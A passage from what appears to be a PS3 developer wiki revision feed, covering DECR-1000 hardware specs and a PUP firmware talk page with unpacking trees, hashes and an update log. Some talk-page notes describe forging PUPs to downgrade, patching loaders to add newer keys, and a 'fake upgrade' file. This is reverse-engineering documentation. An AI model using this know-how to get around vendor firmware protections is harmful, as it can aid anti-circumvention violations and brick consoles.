06 03 0C 09<br /> 07 00 0D 0A 0B 04 01 0E 0F 08 05 02 03 0C 09 06<br /> <br /> == Td0/Te1 ==<br /> <br /> See [[https://invgen.googlecode.com/git-history/53549121c5b903c31cbae01b0cfeaa985035a4a5/Benchmarks/aes/aes_orig/aes_orig_hex2dec.py this]] and [[http://psdevwiki.com/ps3/AES_binaries binaries]] with sbox repeated 4 times<br /> <br /> == T5 ==<br /> Inside lv2_kernel<br /> see [[https://github.com/cforler/Ada-Crypto-Library/blob/master/src/crypto-symmetric-algorithm-aes-tables.ads this ]]<br /> <br /> {{Reverse engineering}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=DECR-1000&diff=43599 DECR-1000 2017-02-20T16:19:31Z <p>Mathieulh: /* Specifications */ Added the factory firmware info.</p> <hr /> <div>= DECR-1000(A/J) =<br /> <br /> == Specifications ==<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! [[:Category:Models|SubModels]]<br /> | [[DECR-1000A]] / [[DECR-1000J]]<br /> |-<br /> ! Type<br /> | 0x01<br /> |-<br /> ! Motherboard<br /> | [[TMU-520]]<br /> |-<br /> ! Flash Storage<br /> | [[K9F2G08U0M|2x 256MB NAND]]<br /> |-<br /> ! [[CELL BE]] / [[RSX]]<br /> | {{90nm}} / {{90nm}}<br /> |-<br /> ! [[South Bridge]]<br /> | [[CXD2973AGB-4]]<br /> |-<br /> ! [[Syscon Hardware|Syscon]]<br /> | [[CXR713F120A]]<br /> |-<br /> ! [[Communication Processor|CP]]<br /> | [[CXD9790GG]] [[TCP-520]]<br /> |-<br /> ! BDemu [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! GameOS [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! [[Bluray Drive]]<br /> | {{YES}}<br /> |-<br /> ! [[HDMI|HDMI Ports]]<br /> | 2<br /> |-<br /> ! [[:Category:Linux|OtherOS]]<br /> | {{NO}} (but [[vsh.self]] or [[sysconf_plugin.sprx]] can be patched to add [[:Category:Linux|OtherOS]] on Firmware [[320.001 DECR|3.20]] or below)<br /> |-<br /> ! [[USB|USB Ports]]<br /> | 6<br /> |-<br /> ! [[GbLAN|GbLAN Ports]]<br /> | 4 (1 for debugger) <br /> |-<br /> ! Serial Ports<br /> | 1 (Hidden next to LAN(DEV) lan port, used in SYSCON emergency updates)<br /> |-<br /> ! [[MultiCardReader|Flash Readers]]<br /> | Yes<br /> |-<br /> ! [[PS2_Compatibility|PS2 mode]]<br /> | {{NO}} (No Emotion Engine or Graphic Synthesizer on the motherboard, no [[Emulation#ps2emu|ps2emu software]] in the official firmware)<br /> |-<br /> ! [[PS1_Compatibility|PS1 mode]]<br /> | {{NO}} (No [[Emulation#ps1emu|ps1emu software]] in the official firmware)<br /> |-<br /> ! [[SA-CD]]<br /> | {{NO}} (The Bluray Drive is compatible but no software exists to play the discs in Official Reference Tool firmwares, EID3 lacks the proper keys normally present on retail consoles)<br /> |-<br /> ! [[Wifi|WiFi802.11b/g]]<br /> | {{YES}}<br /> |-<br /> ! SKU Release date<br /> | 2006<br /> |-<br /> ! [[SCEI PS3 SDK|SDK]] / [[System Software|Firmware]] support<br /> | =&amp;gt;085.010 (flashed at factory, downgrading back to this version requires a compatible ebootrom not officially released, doing this works but isn't officially supported, DO NOT USE THE 085.009 Ebootrom!) &lt;br /&gt;=&amp;gt;1.0.0&lt;br /&gt;=&amp;gt;1.6.0 when refurbished/serviced (RSX rom version isn't supported on older hypervisor)&lt;br /&gt;&amp;nbsp;&amp;nbsp;or&lt;br /&gt;=&amp;gt;2.3.0 (Since Jan 2009)<br /> |-<br /> ! [[Template:Metbootldr|downgradeable Min. praxis]]<br /> | 0.08<br /> |-<br /> ! Other<br /> | contains prototype components, hardware is the same as the [[DEH-R1040]].<br /> |-<br /> ! [[Power Supply]] <br /> | nichihon [[ZSSR541iB]]<br /> * input: AC 100-240V 9.5-4A 50/60Hz (950-960 Watt)&lt;br /&gt;output:<br /> * DC+5V(Sub) 1.6A (8 W)<br /> * DC+3.3V 23A (75.9 W)<br /> * DC+5V 8.2A (41 W)<br /> * DC+12V 31.2A (374.4 W)&lt;!--// 2 labels exist: one stating 9.5-4A for whole range (brand unreadable), other only 9.5A (the highest current for the lowest supported voltage - &quot;nichihon&quot;) //--&gt;<br /> |}<br /> <br /> == Boards ==<br /> === Motherboard ===<br /> [[TMU-520]] [[1-871-645-11]], [[1-871-645-12]], [[1-871-645-13]] - Mainboard<br /> === SubBoards ===<br /> [[BMD-001]] [[1-871-575-11]] - Blu-ray drive controller board<br /> [[TAM-520]] [[1-871-636-11]] - Analog 4-ch. audio output<br /> [[TAV-520]] [[1-871-635-11]] - Analog AV out<br /> [[TBP-520]] [[1-871-644-11]] - Backplane for 2x SATA HDD + BD<br /> [[TCP-520]] [[1-871-646-11]] - Communication Processor board<br /> [[TEJ-520]] [[1-871-641-11]] - HDD Activity/Eject board<br /> [[TFL-520]] [[1-871-638-11]] - Front Panel LEDboard (GPI/GPO/Reset/Start...)<br /> [[TFP-520]] [[1-871-640-11]] - Front Panel Switchboard (GPI/GPO/Reset/Start...)<br /> [[TMR-520]] [[1-871-647-11]] - CP-helper board<br /> [[TMW-520]] [[0-347-825-02]] - Bt/Wifi board<br /> [[TSA-520]] [[1-871-639-11]] - BD PATA-&gt;SATA adapter<br /> [[TUU-520]] [[1-871-643-11]] - Front I/O (Foot-Sw/USB/CardReader)<br /> <br /> == Pictures ==<br /> &lt;Gallery&gt;<br /> File:DECR1000A-frontleft.jpg|[[DECR1000A]] - frontleft<br /> File:DECR1000A-front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A-topback.jpg|[[DECR1000A]] - topback<br /> File:DECR1000A-controller-top.jpg|[[DECR1000A]] - controller top<br /> File:DECR1000A-controller-back.jpg|[[DECR1000A]] - controller back<br /> <br /> File:DECR1000A - back.jpg|[[DECR1000A]] - back<br /> File:DECR1000A - back label.jpg|[[DECR1000A]] - back label<br /> File:DECR1000A - bottom.jpg|[[DECR1000A]] - bottom<br /> File:DECR1000A - front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A - front0.jpg|[[DECR1000A]] - front0<br /> File:DECR1000A - front1.jpg|[[DECR1000A]] - front1<br /> File:DECR1000A - front2.jpg|[[DECR1000A]] - front2<br /> File:DECR1000A - front3.jpg|[[DECR1000A]] - front3<br /> File:DECR1000A - front4.jpg|[[DECR1000A]] - front4<br /> File:DECR1000A - toplabel powerrating.jpg|[[DECR1000A]] - bottomlabel powerrating<br /> <br /> File:DECR-1000A - Nichicon ZSSR541iB 1-474-032-21 PSU labeling.jpg|[[DECR-1000A]] - Nichicon [[ZSSR541iB]] [[1-474-032-21]] [[Power Supply]] labeling<br /> &lt;/Gallery&gt;<br /> <br /> == Links ==<br /> <br /> [https://www.youtube.com/watch?v=lSnoCsZvQiM| Overview and the detailed explaination in French]<br /> &lt;br&gt;<br /> [https://mega.co.nz/#F!XcdAiZpb!-Zy5PmdUwDLKHAogZyvMuA| Pictures of the DECR-1000A boards]<br /> &lt;br&gt;<br /> [ftp://ip-240.net-80-236-71.issy.rev.numericable.fr/Multimedia/TEXT/Computers/Computer%20Architecture/PS3/Instruction_manual_e.pdf Instruction Manual]<br /> &lt;br&gt;<br /> https://fccid.io/AK8DEHR1000<br /> &lt;br&gt;<br /> https://fccid.io/pdf.php?id=686154<br /> <br /> == Comparison ==<br /> {{Reference Tool models}}<br /> <br /> <br /> {{Console Information}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Playstation_Update_Package_(PUP)&diff=43598 Talk:Playstation Update Package (PUP) 2017-02-20T16:12:12Z <p>Mathieulh: /* Using fake upgrade to get lowest firmware version info */ Added more models</p> <hr /> <div>= Playstation Update Package (PUP) - Discussion/Talk =<br /> <br /> What is the part that defines, what firmware it really is?. I mean, for firmwares below 3.55 we have all the keys so whe can forge any PUP and make it appear as a +3.55, that would be a way to downgrade, without the need of a dongle and recovery mode.<br /> <br /> I know there are version strings in pupheader,version.txt, info0, and in vsh.self.. but what is missing? What isn´t correclty set in mfw to make it pass the checks of a legit +3.55 fw? <br /> <br /> We are using recovery mode to downgrade because, we haven´t found a way to create a legit +3.55 <br /> <br /> <br /> == Unpacking a firmware ==<br /> ===Unpack the PUP===<br /> Dots.txt<br /> license.xml<br /> ps3swu.self<br /> ps3swu2.self<br /> spkg_hdr.tar<br /> Update_Files.tar<br /> update_flags.txt<br /> Version.txt<br /> VSH.tar<br /> <br /> === Untar the Update_Files.tar ===<br /> BDIT_FIRMWARE_PACKAGE.pkg<br /> BDPT_FIRMWARE_PACKAGE_301R.pkg<br /> BDPT_FIRMWARE_PACKAGE_302R.pkg<br /> BDPT_FIRMWARE_PACKAGE_303R.pkg<br /> BDPT_FIRMWARE_PACKAGE_304R.pkg<br /> BDPT_FIRMWARE_PACKAGE_306R.pkg<br /> BDPT_FIRMWARE_PACKAGE_308R.pkg<br /> BDPT_FIRMWARE_PACKAGE_310R.pkg<br /> BDPT_FIRMWARE_PACKAGE_312R.pkg<br /> BDPT_FIRMWARE_PACKAGE_314R.pkg<br /> BDPT_FIRMWARE_PACKAGE_316R.pkg<br /> BLUETOOTH_FIRMWARE.pkg<br /> CORE_OS_PACKAGE.pkg<br /> dev_flash3_023.tar.aa.2013_06_20_055817<br /> dev_flash_000.tar.aa.2013_06_20_055817<br /> dev_flash_001.tar.aa.2013_06_20_055817<br /> dev_flash_002.tar.aa.2013_06_20_055817<br /> dev_flash_003.tar.aa.2013_06_20_055817<br /> dev_flash_004.tar.aa.2013_06_20_055817<br /> dev_flash_005.tar.aa.2013_06_20_051337<br /> dev_flash_006.tar.aa.2013_06_20_051337<br /> dev_flash_007.tar.aa.2013_06_20_051337<br /> dev_flash_008.tar.aa.2013_06_20_051337<br /> dev_flash_009.tar.aa.2013_06_20_051337<br /> dev_flash_010.tar.aa.2013_06_20_051337<br /> dev_flash_011.tar.aa.2013_06_20_051337<br /> dev_flash_012.tar.aa.2013_06_20_051337<br /> dev_flash_013.tar.aa.2013_06_20_051337<br /> dev_flash_014.tar.aa.2013_06_20_051337<br /> dev_flash_015.tar.aa.2013_06_20_051337<br /> dev_flash_016.tar.aa.2013_06_20_051337<br /> dev_flash_017.tar.aa.2013_06_20_051337<br /> dev_flash_018.tar.aa.2013_06_20_051337<br /> dev_flash_019.tar.aa.2013_06_20_051337<br /> dev_flash_020.tar.aa.2013_06_20_051337<br /> dev_flash_021.tar.aa.2013_06_20_051337<br /> dev_flash_022.tar.aa.2013_06_20_055817<br /> MULTI_CARD_FIRMWARE.pkg<br /> RL_FOR_PACKAGE.img<br /> RL_FOR_PROGRAM.img<br /> SYS_CON_FIRMWARE_01000006.pkg<br /> SYS_CON_FIRMWARE_01010303.pkg<br /> SYS_CON_FIRMWARE_01020302.pkg<br /> SYS_CON_FIRMWARE_01030302.pkg<br /> SYS_CON_FIRMWARE_01040402.pkg<br /> SYS_CON_FIRMWARE_01050002.pkg<br /> SYS_CON_FIRMWARE_01050101.pkg<br /> SYS_CON_FIRMWARE_S1_00010002083E0832.pkg<br /> UPL.xml.pkg<br /> ==== unpkg CORE_OS_PACKAGE.pkg ====<br /> content<br /> info0<br /> info1<br /> ===== cosunpkg content from CORE_OS_PACKAGE.pkg =====<br /> aim_spu_module.self<br /> appldr<br /> creserved_0<br /> default.spp<br /> emer_init.self<br /> eurus_fw.bin<br /> hdd_copy.self<br /> isoldr<br /> lv0<br /> lv1.self<br /> lv1ldr<br /> lv2ldr<br /> lv2_kernel.self<br /> manu_info_spu_module.self<br /> mc_iso_spu_module.self<br /> me_iso_spu_module.self<br /> sb_iso_spu_module.self<br /> sc_iso.self<br /> sdk_version<br /> spp_verifier.self<br /> spu_pkg_rvk_verifier.self<br /> spu_token_processor.self<br /> spu_utoken_processor.self<br /> sv_iso_spu_module.self<br /> ====== unself the self's ======<br /> ...<br /> ==== unpkg dev_flash* ====<br /> content<br /> info0<br /> info1<br /> ===== untar dev_flash* content =====<br /> ...<br /> <br /> ==3.55 example==<br /> <br /> PSUPDATE.PUP<br /> ├── dots.txt<br /> ├── license.txt<br /> ├── ps3swu.self <br /> ├── update_files.tar<br /> │ ├── BDIT_FIRMWARE_PACKAGE.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_301R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_302R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_303R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_304R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_306R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BDPT_FIRMWARE_PACKAGE_308R.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── BLUETOOTH_FIRMWARE.pkg<br /> │ │ ├── content<br /> │ │ │ ├── RC29_firmware_footer.dfu<br /> │ │ │ ├── usb8780-5.0.1-A1-A2.dfu<br /> │ │ │ └── usb8781-20.0.12.0.dfu<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── CORE_OS_PACKAGE.pkg<br /> │ │ ├── aim_spu_module.self<br /> │ │ ├── appldr<br /> │ │ ├── creserved_0<br /> │ │ ├── default.spp<br /> │ │ ├── emer_init.self<br /> │ │ ├── eurus_fw.bin<br /> │ │ ├── hdd_copy.self<br /> │ │ ├── isoldr<br /> │ │ ├── lv0<br /> │ │ ├── lv1ldr<br /> │ │ ├── lv1.self<br /> │ │ ├── lv2_kernel.self<br /> │ │ ├── lv2ldr<br /> │ │ ├── manu_info_spu_module.self<br /> │ │ ├── mc_iso_spu_module.self<br /> │ │ ├── me_iso_spu_module.self<br /> │ │ ├── sb_iso_spu_module.self<br /> │ │ ├── sc_iso.self<br /> │ │ ├── sdk_version<br /> │ │ ├── spp_verifier.self<br /> │ │ ├── spu_pkg_rvk_verifier.self<br /> │ │ ├── spu_token_processor.self<br /> │ │ ├── spu_utoken_processor.self<br /> │ │ └── sv_iso_spu_module.self<br /> │ ├── dev_flash_''XXX''.tar.aa.''DATE/TIME''<br /> │ ├── dev_flash3_''XXX''.tar.aa.''DATE/TIME''<br /> │ ├── MULTI_CARD_FIRMWARE.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── RL_FOR_PACKAGE.img<br /> │ ├── RL_FOR_PROGRAM.img<br /> │ ├── SYS_CON_FIRMWARE_01000006.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01010303.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01020302<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01030302.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01040402.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01050002.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_01050101.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ ├── SYS_CON_FIRMWARE_S1_00010002083E0832.pkg<br /> │ │ ├── content<br /> │ │ ├── info0<br /> │ │ └── info1<br /> │ └── UPL.xml.pkg<br /> │ ├── content<br /> │ ├── info0<br /> │ └── info1<br /> ├── update_files.tar<br /> ├── update_flags.txt<br /> ├── version.txt<br /> └── vsh.tar<br /> <br /> ----<br /> <br /> ==Adding new keys to older firmwares==<br /> <br /> patch the loaders<br /> add keys to appldr keys index &amp; tables<br /> there are also npdrm keys inside appldr as well, add the 3.56++ ones<br /> appldr,. lv2.self and game_ext_plugin need patching for new games support<br /> vsh.self maybe too<br /> [http://www.ps3hax.net/showpost.php?p=260186&amp;postcount=14 Creating a MFW? (3.41/3.55 with 3.56 keys)]<br /> <br /> <br /> Proof of concept with added keys to appldr (and none of the other mentioned files above) : [[Talk:Patches#appldr_3.55_add_3.56.2F3.60_keys|appldr 3.55 add 3.56/3.60 keys]]<br /> <br /> ----<br /> <br /> == Using fake upgrade to get lowest firmware version info ==<br /> &lt;div style=&quot;float:right&quot;&gt;[[File:PS3 MinVerChk used on CECHG04 SEM-001.jpg|thumb|left|PS3_MinVerChk use on the CECHG04, using fake upgrade to get lowest firmware version info]]&lt;/div&gt;<br /> <br /> &lt;span style=&quot;text-decoration: line-through;&quot;&gt;http://ps3devwiki.com/files/firmware/MFW-CEX/MinVerCheck/&lt;/span&gt; // &lt;span style=&quot;text-decoration: line-through;&quot;&gt;[http://www.mirrorcreator.com/files/KMIA5YMJ/MinVerCheck.rar_links MinVerChk.rar (1.28 KB)]&lt;/span&gt; / &lt;span style=&quot;text-decoration: line-through;&quot;&gt;[http://www.sendspace.com/file/l2fixi mirror]&lt;/span&gt; --- [https://mega.nz/#!FUVm1C7a!IbCyN_uzCQh7hZb7eu3pRrwBuezLh1r4Ha7eeB9RlZk mirror 2]<br /> CRC-16: 9A11<br /> CRC-32 (Ethernet and PKZIP): 50EE9A92<br /> SHA-1: 1B60E0ADE8E698D9796AA78B7AD54B10E05A9B0B<br /> MD-5: BB39828156BC7DF144E4D06D81C801AB<br /> # Unrar and copy this MinVerChk PUP to your USB stick (/PS3/UPDATE/PS3UPDAT.PUP), the same way as if it was an firmware upgrade.<br /> # Insert the USB stick into the PS3.<br /> # Start a firmware update like normal from XMB (Don’t worry, it will not update!)<br /> # It will shortly fail and display the Firmware Base Value<br /> <br /> Note: console needs to run at least FW 2.50? (2.30 didn't work); This only works when the minimum update version is 1.00, otherwise any minimum value lower than 1.00 reports as 1.00 using this method.<br /> DECR-1000 (0.08), DEH-H1000A-E (??0.92??), DEH-H1001-D (??0.92??), DECHA00A (??0.92??) are effectively affected by this.<br /> <br /> ----<br /> <br /> == Hashes ==<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable sortable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Version !! MD5 !! SHA1 !! CRC32 !! CRC16 !! HMAC_SHA1<br /> |-<br /> | 0 file (do not use) || MD5::1f5039e50bd66b290c56684d8550c6c2 || SHA1::7b91dbdc56c5781edf6c8847b4aa6965566c5c75 || CRC32::2A0E7DBB || CRC16::0 || HMAC_SHA1::<br /> |-<br /> | 3.41 RETAIL/CEX PSJB || MD5::6f1ef9144c43c9a6f00f7ee7464a6689 || SHA1::f3c19e06c0e7b8cc550bb3244f5f88356173fa6d || CRC32::8A1E7548 || CRC16::7FFC || HMAC_SHA1::9F7001A6A93AE03A61ED7CFB7156A68DF0740708<br /> |-<br /> |}<br /> <br /> <br /> === PS3UPDAT.SHA === <br /> <br /> Some BluRay-Movie Discs contain firmware updates for the Playstation 3 Console. Inside the /PS3/UPDATE folder can be a file called &quot;PS3UPDAT.SHA&quot;.<br /> <br /> ==== example ====<br /> <br /> This is an example from the movie &quot;Priest&quot; with [[3.50 CEX|3.50]] firmware<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! 0x002F070 - 0x002F8CF <br /> |-<br /> | &lt;pre&gt;Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 00000000 61 7F 7F 6B 07 07 07 0B 00 00 00 00 00 00 00 00 a..k............<br /> 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br /> 00000020 B8 19 86 1F 75 D5 08 82 14 2C BE C8 AF 54 B0 00 ....u....,...T..<br /> 00000030 12 BC 04 9D 00 00 00 00 00 00 00 00 00 00 00 00 ................<br /> &lt;/pre&gt;<br /> |-<br /> |}<br /> ==== structure ====<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address !! Size !! Value !! Description !! Observations <br /> |-<br /> | 0x0 || 0x8 || 61 7F 7F 6B 07 07 07 0B || Unknown || <br /> |-<br /> | 0x8 || 0x18 || 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 || Padding ||<br /> |-<br /> | 0x20 || 0x14 || B8 19 86 1F 75 D5 08 82 14 2C BE C8 AF 54 B0 00 12 BC 04 9D || SHA1 hash of PS3UPDAT.PUP || <br /> |-<br /> | 0x34 || 0xC || 00 00 00 00 00 00 00 00 00 00 00 00 || Padding || <br /> |-<br /> | Rest || Rest || Rest || Encrypted Data ||<br /> |}<br /> <br /> <br /> ----<br /> <br /> ==Repositories==<br /> <br /> [http://pubrepo.stoker25.com/Consoles/Playstation%203/updates/ stoker25 - specialises in debug/DEX and DECR/TOOL firmwares] (self hosted)<br /> <br /> == Remark @ Installation ==<br /> <br /> ps3d storage region 3 on the internal harddisk (ps3dc) is used by the PS3 as temp for installing updates. When installing PUP files, the PUP content gets unpacked there, checked - the system flags the update bit and prompts for reboot. After reboot it sees the update bit set and installs the files from ps3dc without rechecking (!) -&gt; possible attack vector for circumventing checks, like down-/crossgrading). edit-note: doesn't seem to be true, it is still checked.<br /> <br /> ps3d - 4 possible regions :<br /> ps3da : whole disk<br /> ps3db : UFS2 : GameOS<br /> ps3dc : FAT (2GB) : Update<br /> ps3dd : EXT3 : OtherOS (in the &lt;=3.15 way)<br /> <br /> <br /> == No applicable data found - technical pov ==<br /> <br /> Reasons why the playstation updating process does not recognize a pup.<br /> <br /> * 1) Missing files/Reading failure of:<br /> ** [[patch_build.txt]] (vsh target)<br /> ** [[promo_flags.txt]] (incorrect flag will result in &quot;data corrupt&quot;)<br /> <br /> * 2) [[update_files.tar]]<br /> ** unable to open PUP (rb)<br /> ** unable to read first 0x30 Bytes (header)<br /> ** unable to read further 0x20 Bytes sized segment_table (aka file tables)<br /> ** unable to find [[CoreOS|core os package.pkg]] inside update_files.tar<br /> <br /> * 3) Unable to open Storage Region 1/2 on HDD.<br /> * 4) No Media present. (no success when fstat)<br /> <br /> == Sample Logs normal installation ==<br /> http://pastie.org/10059999<br /> &lt;pre&gt;<br /> cellFsUtilMount: /dev_hdd0<br /> Configuration read. bd_video_region=0,dvd_video_region=0<br /> spoof_version = 0000, spoof_revision = 0<br /> BDemulator: disabled<br /> real disc type = ff71<br /> effective disc type = ff71, fake disc type = 0<br /> probe hdd<br /> (v)HDD found.<br /> probe hdd done<br /> vflash is enabled. search system region.<br /> search system region<br /> device_id = 0x101000000000007, system_region_id = 0x1<br /> ACL[0]: LAID = 0x1070000001000001 : ACL =0xb<br /> system region found(mode = 0).<br /> search system region done.<br /> search flash regions<br /> cellFsUtilMount: /dev_flash<br /> /dev_flash is clean.<br /> [(v)flash]<br /> info.vendor_id = 0x0<br /> info.device_id = 0x0<br /> info.sector_size = 0x200<br /> info.media_count = 0x1<br /> info.capacity = 0x80000<br /> [device_id = 0x100000200000001]<br /> info.capacity = 0x63e00<br /> flash region 0x2 found.<br /> expected: start sectors = 0x7800, n_sectors = 0x63e00<br /> start sector = 0x7800.<br /> start sector is correct<br /> region size is correct<br /> [device_id = 0x100000300000001]<br /> info.capacity = 0x8000<br /> flash region 0x3 found.<br /> expected: start sectors = 0x6b600, n_sectors = 0x8000<br /> start sector = 0x6b600.<br /> [device_id = 0x100000400000001]<br /> info.capacity = 0x400<br /> flash region 0x4 found.<br /> expected: start sectors = 0x73600, n_sectors = 0x400<br /> start sector = 0x73600.<br /> [device_id = 0x100000500000001]<br /> info.capacity = 0x2000<br /> flash region 0x5 found.<br /> expected: start sectors = 0x73a00, n_sectors = 0x2000<br /> start sector = 0x73a00.<br /> found all flash regions.<br /> search normal region<br /> normal region 1 found.<br /> search normal region done.<br /> normal region 2 found.<br /> Storage event: 7 0 10300000000000a<br /> Storage event: 3 0 10300000000000a<br /> search update package<br /> seach update package in GAME disc<br /> Disc auth: 5004 29 (process: 01000200_main_mer_init.self)<br /> set drive policy success<br /> profile = 0xff71<br /> umount BDVD<br /> umount /dev_bdvd failure = 0x80010002<br /> mount BDVD<br /> cellFsUtilMount: /dev_bdvd<br /> mount /dev_bdvd success<br /> /dev_bdvd/PS3_UPDATE/PS3UPDAT.PUP found<br /> verify /dev_bdvd/PS3_UPDATE/PS3UPDAT.PUP<br /> Initializing<br /> taking a while...<br /> start Updating Proccess<br /> Initialize elapsed time = 3325 msec<br /> check UPL<br /> Check UPL elapsed time = 79 msec<br /> check Package Size<br /> get package size elapsed time = 25 msec<br /> start Verifying Package only<br /> update package elapsed time = 1731 msec<br /> Updating or Verifying failure 0x8002f169<br /> USB storage: id = 0x10300000000000a<br /> lun = 0x0<br /> info.capacity = 0xffffffffe8df8800<br /> lun = 0x0, dev_index = 0xa<br /> index = 0x0, pkg_index = 0x2<br /> mount USB storage 0<br /> mp_name = /dev_usb000<br /> umount /dev_usb000 failure = 0x80010002<br /> mount USB storage 0(LUN=0x0)<br /> dev_name = CELL_FS_IOS:USB_MASS_STORAGE000, mp_name = /dev_usb000<br /> cellFsUtilMount: /dev_usb000<br /> mount /dev_usb000 success<br /> /dev_usb000/PS3/UPDATE/PS3UPDAT.PUP found<br /> verify /dev_usb000/PS3/UPDATE/PS3UPDAT.PUP<br /> Storage event: 4 0 101000000000006<br /> Disc removed.<br /> Storage event: 8 0 101000000000006<br /> Initialize elapsed time = 547 msec<br /> Check UPL elapsed time = 148 msec<br /> get package size elapsed time = 17 msec<br /> update package elapsed time = 18979 msec<br /> post processiong...<br /> post processiong done<br /> search update package done<br /> not to be skipped formatting system region.<br /> re-use old partitions.<br /> re-use old flash partitions.<br /> cellFsUtilMount: /dev_hdd1<br /> setup environment for ps3updater<br /> mount game cache<br /> mount game cache success<br /> mkdir /dev_hdd1/PS3UPDATE success<br /> mkdir /dev_hdd1/PS3UPDATE/vsh success<br /> mkdir /dev_hdd1/PS3UPDATE/vsh/etc success<br /> mkdir /dev_hdd1/PS3UPDATE/data success<br /> mkdir /dev_hdd1/PS3UPDATE/data/font success<br /> Initialize elapsed time = 582 msec<br /> Check UPL elapsed time = 160 msec<br /> update package elapsed time = 20137 msec<br /> copy /dev_usb000/PS3/UPDATE/PS3UPDAT.PUP to /dev_hdd1/PS3UPDATE/PS3UPDAT.PUP<br /> copy id = 0x100, dst = /dev_hdd1/PS3UPDATE/ps3version.txt<br /> copy id = 0x601, dst = /dev_hdd1/PS3UPDATE/ps3swu.self<br /> extarct id = 0x201, dst = /dev_hdd1/PS3UPDATE<br /> segment = 0x300, offset = 0x56f5b0, size = 0xc0e4c00<br /> file_num = 51<br /> required patch_name : /BDIT_FIRMWARE_PACKAGE.pkg.spkg_hdr.1<br /> segment = 0x501, offset = 0xc6541b0, size = 0x14000<br /> file_num = 49<br /> patch found: offset = 0xc6543b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_301R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6549b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_302R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc654fb0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_303R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6555b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_304R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc655bb0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_306R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6561b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_308R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6567b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_310R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc656db0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_312R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6573b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_314R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6579b0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_316R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc657fb0, size = 0x280<br /> required patch_name : /BDPT_FIRMWARE_PACKAGE_318R.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6585b0, size = 0x280<br /> required patch_name : /BLUETOOTH_FIRMWARE.pkg.spkg_hdr.1<br /> patch found: offset = 0xc658bb0, size = 0x280<br /> required patch_name : /CORE_OS_PACKAGE.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6591b0, size = 0x280<br /> required patch_name : /MULTI_CARD_FIRMWARE.pkg.spkg_hdr.1<br /> patch found: offset = 0xc6597b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01000006.pkg.spkg_hdr.1<br /> patch found: offset = 0xc659db0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01010303.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65a3b0, size = 0x280<br /> required patch_name : 